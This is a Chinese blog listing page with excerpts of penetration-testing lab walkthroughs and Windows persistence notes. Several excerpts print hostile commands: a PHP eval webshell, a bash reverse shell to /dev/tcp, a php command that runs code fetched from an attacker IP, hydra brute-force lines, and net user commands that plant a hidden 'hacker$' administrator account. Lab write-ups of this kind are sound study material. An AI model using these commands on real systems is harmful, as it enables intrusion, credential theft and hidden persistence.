- 博客(57)
- 收藏
- 关注
RSS订阅原创 Servlet
MVC工作流程 Controller接收用户的请求,并决定调用哪个Model来进行处理 Model用逻辑处理用户的请求并返回数据 View将返回的数据呈现给用户 Servlet Servlet 其实是在 Java Web 容器中运行的小程序。用户通常使用 Servlet 来处理一些较为复杂的服务器端的业务逻辑。 Servlet的配置 基于web.xml 在 web.xml 中,Servlet 的配置在 Servlet 标签中,Servlet 标签是由 Servlet 和 Servlet-mapping 标
2022-05-20 09:00:00
467
原创 靶机渗透日记
IP探测 端口扫描 访问 80 端口 目录扫描 访问 tips.txt 提示寻找 creds.txt ,访问 creds.txt 文件不存在 访问 /webdav 目录 WebDAV 基于 HTTP 协议的通信协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。因为基于HTTP,在广域网上共享文件有天然的优势,移动端文件..
2022-04-29 10:00:00
401
原创 靶机渗透日记
IP地址探测 端口扫描 访问80端口 FTP不能匿名访问 目录扫描 访问 /hidden_text 点击 Thank You 出现一个二维码 通过对二维码解码,获得FTP的账号密码 登录FTP 查看information.txt文件 robin的密码可能是p_lists.txt其中的一个 爆破ssh 登录ssh获得flag1 执行sudo -l feedback.sh文件内容如下 #!/bin/bash clear echo -e "Scri..
2022-04-28 11:52:54
382
原创 靶机渗透日记
IP 端口 访问 80 端口 访问81端口,发现是极致CMS,并且查阅资料得知存在漏洞,但是需要先进后台 目录扫描 访问 readme.txt ,发现版本为 1.8.1 /admin.php 即为后台管理登录 爆破用户名密码,得到admin123 通过插件getshell 参考:极致CMS漏洞getshell 配置密码 编辑index.php文件 插入 $a = $GLOBALS; $str = '_POST'; eval/**nice**/(''. $a[$st...
2022-04-02 10:30:00
645
原创 靶机渗透日记
端口 访问 80,8080 端口 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TKhhG4Yh-1648536567888)(C:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20220329104817041.png)] 思路:后台上传war包 弱口令爆破 使用burpsuite [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vBb1..
2022-04-01 10:30:00
163
原创 靶机渗透日记
端口 访问http 正在维护中 目录扫描 访问 phpphadmin 版本为 5.1 ,搜索漏洞发现存在经过认证的远程命令执行(CVE-2019-9193) 尝试弱口令,用户名为 postgres 漏洞利用 反弹shell 信息收集 存在 erik 用户 隐藏文件 查看 .creds.log 目标主机的FTP可以匿名登录,其中一个文件说明了加密方式 解密 切换到 erik 用户 查看 remove 文件 运行了 time 命令,通过修改环境变量..
2022-03-31 09:30:00
201
原创 靶机渗透日记
端口 访问 80 端口 通过页面显示可以发现web尝试ping了访问者的IP地址 抓包使用wireshark分析 监听 tcpdump -i eth0 icmp -w icmp 发现有四个请求包,其中两个包内含有用户名和密码 得到用户名和密码,使用ssh登录 执行sudo -l 通过ping命令发送文件 本地监听 tcpdump -i eth0 icmp -w rev 服务器执行 sudo sendfilebyping 192.168.0.128 /root/root.txt..
2022-03-30 09:30:00
359
原创 靶机渗透日记 noob
端口 访问 6530 端口 目录扫描 /index (Status: 200) [Size: 19] /nt4share (Status: 301) [Size: 45] [--> /nt4share/] 访问 /nt4share 使用私钥进行ssh登录 获取用户名 创建软连接 ln -s /root root ssh 连接 ...
2022-03-29 10:00:00
294
原创 靶机渗透日记
端口 访问 80 端口 just a picture 目录扫描 /index.html (Status: 200) [Size: 80] /javascript (Status: 301) [Size: 319] [--> http://192.168.0.140/javascript/] /advanced-search (Status: 301) [Size: 324] [--> http://192.168.0.140/ad..
2022-03-28 09:00:00
555
原创 靶机渗透日记
端口 访问 80 端口 文件上传功能,上传php文件 目录扫描 访问 /uploads 提示 403 ,但是可以访问到上传的文件 再次上传文件 发现延迟了3s,猜测是等待了3s后对文件变更名字,可以尝试在这3s内不断访问该文件 创建脚本,并上传反弹shell #!/bin/bash while true do curl "http://192.168.0.139/uploads/shell.php" done 成功反弹 在 /opt/gancio 目录下..
2022-03-25 10:00:00
433
原创 靶机渗透日记
端口 访问 80 端口 源代码中包含作者 目录扫描,发现 /secrets 继续对该目录扫描 对登录框进行爆破 hydra -l brad -P /usr/share/wordlists/rockyou.txt 192.168.0.138 http-post-form "/secrets//MK67IT044XYGGIIWLGS9.php:user=brad&password=^PASS^:Invalid Credentials" 登录网站是一个输入框,并且只..
2022-03-24 10:00:00
231
原创 靶机渗透日记
IP 端口 访问80端口,空白页面 目录扫描 访问 sshnote.txt 根据提示,RSA key 中的三个大写字母被*号替换了,并且用户为 sophie 利用网站中的cookie base64解码为 poisonedgift.txt ,访问得到私钥保存为 id_rsa 生成三个大写字母的字典 crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ > dict.txt 创建存在 id_rsa 的目录 mkdir keysdir 创建脚..
2022-03-23 15:00:00
383
原创 靶机渗透日记-内网
WEB win7/admin 域成员 win2016/Admin#123 域控 administrator/Admin@666 流程 IP探测 端口扫描 Win7系统,并且开放了139,445端口,尝试MS17-010 返回 system 权限 还有一种思路就是利用80端口的通达OA系统 使用工具上传一句话木马,使用蚁剑连接GETSHELL 信息收集,发现WEB服务器存在双网卡 添加路由信息 run post/multi/manage/autoro..
2022-03-22 14:35:38
3748
原创 靶机渗透日记 DarkHole2
端口 访问 80 端口 目录扫描 发现存在 .git 泄露,登录页面需要输入邮箱及密码,除此之外并没有其他信息 下载 .git 源码 wget -r http://192.168.0.134/.git 查看 git 日志 git log 图中显示带有默认凭证的login.php文件 切换到该版本进行查看 git checkout a4d9 得到账号密码 登录用户可以发现 URL 中带有参数 id,发现存在SQL注入 http://192.168.0.134/dash..
2022-03-10 08:00:00
284
原创 靶机渗透日记 Billu_b0x
端口 访问 80 端口 目录扫描 /add.php 文件下存在文件上传 没有上传成功 /test.php 缺少 file 参数,构造URL http://ip/test.php?file=/etc/passwd 尝试不行,使用 post 方式 依次读取目录扫描到的文件 //add.php <?php echo '<form method="post" enctype="multipart/form-data"> Select image to ..
2022-03-09 08:00:00
457
原创 靶机渗透 blog
端口 访问 80 端口 目录扫描 在 /my_weblog 目录下 访问 README 发现是使用 nibbleblog 搭建的,4.0.3版本存在任意文件上传漏洞 需要使用到后台的账号密码 账号爆破 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incor..
2022-03-08 08:00:00
382
原创 靶机渗透日记
端口 访问 80 端口 wordpress 搭建的网站 目录扫描 使用 wpscan 扫描 没有扫描到插件信息,但是扫描到了 admin 用户 爆破 admin wpscan --url http://192.168.0.134 -U admin -P /usr/share/wordlists/rockyou.txt 得到账号密码,登录后台,编辑模板成功GETSHELL 信息收集 ls -al /var/www/.bash_history 结合下面 su - fat..
2022-03-07 08:00:00
222
原创 靶机渗透日记
IP 端口 访问 80 端口 发现是 wordpress 主题 目录扫描 只有一个 index.html 查看网页源代码 查阅资料得知上面的 html 页面是一种加密方式,需要对其解密,密码格式如源码中显示 得到 sys.hidden.hmv 访问该域名 目录扫描 发现了三个目录,依次对目录进行扫描,最终再 /weapon 目录下发现 loot.php 访问该页面发现是空白,猜测有文件包含或者有参数 ffuf -u http://sys.hidden.hmv/..
2022-03-05 10:00:00
225
原创 靶机渗透日记 [入门级]
端口 访问 80 端口 不要想太多,非常简单 😂 目录扫描 只有一个 index.html,除此之外没有任何东西 根据提示直接爆破 ssh
2022-03-04 08:00:00
217
原创 靶机渗透日记
端口 目录 访问 80 端口 发现存在上传功能 发现可以上传文件,但是不能解析 查找子域名 ffuf -u http://forge.htb -w subdomains-top1million-5000.txt -H "HOST:FUZZ.forge.htb" -mc 200 访问子域名,提示只能本地访问 返回上传页面,还存在一个从URL上传的选项 这里本地起一个web服务器,请求web服务器上的一个文件 发现目标主机确实向本地的服务器请求了 123.php ,这里..
2022-03-02 08:00:00
220
原创 靶机渗透日记
IP 端口 访问 80 端口 目录扫描 robots.txt & note.txt 访问 crossroads.png ,是一张图片 访问 SMB smbclient -L 192.168.0.133 访问 smbshare 提示需要密码 对目标上的SMB信息进行枚举 enum4linux 192.168.0.133 -A 爆破 SMB 密码 登录 SMB 服务 smbclient //192.168.0.133/smbshare -U ..
2022-03-01 13:04:31
3644
原创 靶机渗透日记 responder
IP 端口 访问 80 端口只有一句话,目录扫描 访问 /filemanager.php 会跳转到 index.php ,可能是因为没有参数的原因,接下来爆破参数 ffuf -u http://192.168.0.132/filemanager.php?FUZZ=/etc/passwd -w /root/Filenames_or_Directories_All.txt -fs 0 得到参数 random ,burpsuite 抓包测试 使用 php 伪协议读取 filemanag..
2022-02-28 13:34:56
3326
原创 靶机渗透日记 otp
IP 端口 访问 80 端口 目录扫描 子域名扫描 访问子域名 这里存在一个 Login 登录框,账号密码存在个人信息中的源码中 登录后得到一个新的用户名 david 由于目标机器还开放了21号端口,尝试进行爆破 连接 FTP 查看 Apache 配置文件 找到网站的根目录 这里发现文件夹 u9104d_ 完全访问权限 将 webshell 上传至该文件夹中直接连接 在 /otp 目录下 存在 sql 文件 使用 base32 解码得到 n3v..
2022-02-28 08:00:00
367
原创 靶机渗透日记 messages
IP 端口 访问 80 端口 两个功能点,一个是 chatbot ,一个是 Webmail 对这两部分进行目录扫描 发现在 /chatbot 目录下存在 后台登陆页面 寻找源码,关键字 Simple ChatBot Application 得到后台的默认密码,成功访问 登录到后台发现可以上传头像,上传一个 webshell ,这里上传一句话发现怎么都无法连接,并且我只能上传到 user_avatar ,上传到 bot_avatar 上会变成 jsp 后缀文件 在 /h..
2022-02-26 12:20:01
449
原创 靶机渗透日记 controller
IP 端口 目录扫描 发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来 访问80端口 文档说明我们可以上传一个项目,并可以被运行 服务器还开放了 139,445 端口,访问 SMB 服务 可以匿名访问 上传 shell.txt import commands commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/t..
2022-02-25 12:13:31
1975
原创 靶机渗透日记 funbox
ip 端口 访问 80 端口 目录扫描 访问 robots.txt , /secret ,/admin/?/login 发现都没有得到有用的东西,继续对 /store 目录扫描 同样存在后台地址 访问该后台地址 这里通过尝试弱口令或者在 books 标签页中发现参数 bookisbn 存在sql注入,通过 sqlmap 也可以得到后台管理员的账号密码 发现存在文件上传,尝试上传webshell 在Image可以直接上传.php可以成功getshell 在 /home/to.
2022-02-22 09:42:28
978
原创 靶机渗透日记 利用SSRF
端口 这里应该没有一个处于 filter 的 ftp 端口 目录 访问 80 端口 发现存在上传功能 发现可以上传文件,但是不能解析 查找子域名 ffuf -u http://forge.htb -w subdomains-top1million-5000.txt -H "HOST:FUZZ.forge.htb" -mc 200 访问子域名,提示只能本地访问 返回上传页面,还存在一个从URL上传的选项 这里本地起一个web服务器,请求web服务器上的一个文件 发现目..
2022-02-11 08:00:00
607
原创 靶机渗透日记 Jangow
ip 端口 测试发现不能匿名登录 ftp 目录扫描 发现敏感文件 .backup 访问 浏览网站页面,发现其中一个页面可以执行命令 利用命令执行无法反弹shell,生成一句话 在 /home/jangow01 得到 flag1 发现 443 端口没有被做限制 反弹shell 发现存在 jangow01 用户 使用 .backup 里的账号密码尝试登录 提权 可以看到可以使用 dirtycow 进行提权 ,靶机直接死机 换成 CVE-201..
2022-02-10 08:00:00
358
原创 windows文件隐藏
一、为文件或目录设置隐藏属性 Attrib 语法 attrib [{+r|-r}] [{+a|-a}] [{+s|-s}] [{+h|-h}] [[Drive**:][Path] FileName] [/s**[/d]] 参数 +r :设置只读文件属性。 -r :清除只读文件属性。 +a :设置存档文件属性。 -a :清除存档文件属性。 +s :设置系统文件属性。 -s :清除系统文件属性。 +h :设置隐藏文件属性。 -h :清除隐藏文件属性。 [ Drive : ][ Path ] FileNam
2022-02-09 10:00:00
917
原创 靶机渗透日记 domdom
ip 端口 访问80端口 目录扫描 访问 /admin.php 使用 burp 抓包 将 index.php 修改成 admin.php 添加 cmd 参数,结果返回响应的信息 反弹shell name=123&username=123&password=123&access=access&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.1..
2022-02-08 16:00:00
366
原创 WAF分类
可以把WAF分为四类: 云WAF类 云waf基于云端的检测,安装简单,修改DNS解析或在服务器安装云WAF的模块即可。安全宝 创宇盾 玄武盾 腾讯云 百度云 西部数码 阿里云盾 奇安信网站卫士 硬件WAF类 硬件WAF串联在内网的交换机上,防护范围大。绿盟 安恒 铱迅 天融信 深信服 启明星辰 知道创宇 F5 BIG-IP 软件WAF类 软件WAF安装在服务器上根据网站流量决定占用的内存量。D盾:http://www.d99net.net/ 云锁:https://yunsuo.qianxin.co
2022-02-08 08:00:00
498
原创 靶机渗透日记 hackNos: Os-Hax
靶机地址:https://www.vulnhub.com/entry/hacknos-os-hax,389/ 文章目录信息收集Getshell方法一方法二提权参考链接 信息收集 ip 端口 目录扫描 发现存在 wordpress 使用 wpscan 发现存在 web 用户 没有发现插件 在 /img 目录下存在 flaghost.png 用exiftool查看了一下图片信息 exiftool flaghost.png 可能是 web 用户的密码,尝试后发现是路径
2022-02-07 10:00:00
454
原创 靶机渗透日记 Trollcave
IP 端口 访问80端口 右侧出现了用户,点击 xer 用户,url栏如下 我们尝试更改 /users/ 后的值,发现此处存在用户遍历,修改成 1 时,用户是 King 为 superadmin 权限,修改成 2 时,用户是 dave 为 admin 有一篇文章提到了关于重置用户密码 访问 192.168.154.134/password_resets 提示不存在,扫描后得到路径 尝试修改用户 king 和 dave 发现修改不成功,提示只能修改普通用户,我们修改 xer 用户,此..
2022-02-03 14:00:00
442
原创 靶机渗透日记
0x01 信息收集 ip 端口 nmap -sC -sV -p- -T4 10.35.0.119 从 Nmap 扫描中,我们看到了一个 git 远程存储库 该 cms 是一个网上录取系统,网站源码如下 0x02 代码审计 adminsession.php 用来检查管理员会话 <?php extract($_POST); if (!isset($_SESSION[ad])) { echo "<br>You are not Logged In Pl
2022-02-02 14:00:00
358
原创 靶机渗透日记
IP 端口 访问80端口 网页源码 目录扫描 访问robots.txt 看起来并没有什么作用,其实是提示我们组成一个字符串s3cr3tz0n3 拼接该字符串组成URL,返回音符
2022-02-01 16:18:18
2701
原创 靶机渗透日记
IP为 192.168.154.130 端口扫描,开放了 22,80 ,8080 访问80端口 访问8080端口 目录扫描 note.txt内容如下Alert! We have a vulnerability in our java application... Notify the programming department to check Log4J. -Admin 提示存在log4j漏洞 ...
2022-01-25 15:08:41
2261
原创 靶机渗透日记
探测IP为192.168.1.214 端口开放了22,80端口 目录扫描 访问 80 端口 这里并没有发现其他可以利用的东西 访问 notes.txt 暂时用处也不大 访问 assets 文件夹 里面是一些js,css,图片也没有利用点 接下来在主页进行抓包 在主页发现cookie值像是base64 解密为false,尝试改成true并进行base64加密更改cookie值 刷新页面出现上传按钮 进入后发现可以上传文件,这里可以将.php后缀更改为.p..
2022-01-21 13:12:20
2590
原创 windows隐藏账号
手动创建 1.添加$符 net user hacker$ Passw0rd /add net localgroup administrators hacker$ /add 但是在控制面板中可以查看到 使用 wmic 也可以查看 wmic useraccount get Name 删除用户 net user hacker$ /del 2.修改注册表 打开注册表 HKEY_LOCAL_MACHINE\SAM\SAM\ 关闭注册表再次打开 HKEY_LOCAL_MACHINE\SAM\SAM\Doma
2022-01-19 12:13:53
1596
原创 靶机渗透日记
IP为 端口 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) 80/tcp open http Apache httpd 2.4.48 ((Debian)) 访问 80 端口是一张图片,接下来目录扫描 [23:08:42] 301 - 312B - /image -> http://192.168.1.64/image/ ..
2022-01-17 16:15:01
1639
原创 sqlmap中转注入
当使用 sqlmap 测试注入点时出现下列信息时,就需要在请求网址时忽略SSL证书 python3 sqlmap.py -u "http://xxxx?&daxxtae=null¶me=xxxxxx" --batch --delay=1 --random-agent ___ __H__ ___ ___["]_____ ___ ___ {1.5.4.7#dev} |_ -| . [)] | .'| . | |___|_ ["]_|_|_|__
2022-01-14 21:00:00
2336
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人